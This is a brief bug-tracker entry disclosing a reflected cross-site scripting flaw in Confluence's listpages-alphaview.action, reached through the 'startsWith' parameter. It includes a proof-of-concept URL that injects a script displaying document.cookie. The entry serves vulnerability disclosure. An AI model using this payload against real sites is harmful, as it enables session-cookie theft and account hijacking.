XSS vulnerability in app/pages/listpages-alphaview.action

2007-07-19T12:56:54
ID ATLASSIAN:CONFSERVER-8952
Type atlassian
Reporter felho
Modified 2017-02-17T05:35:50

Description

Description: XSS via the "startsWith" field in pages/listpages-alphaview.action.

Exploit: {noformat}http://app/pages/listpages-alphaview.action?key=&startsWith=xss:<script>alert(document.cookie)</script>{noformat}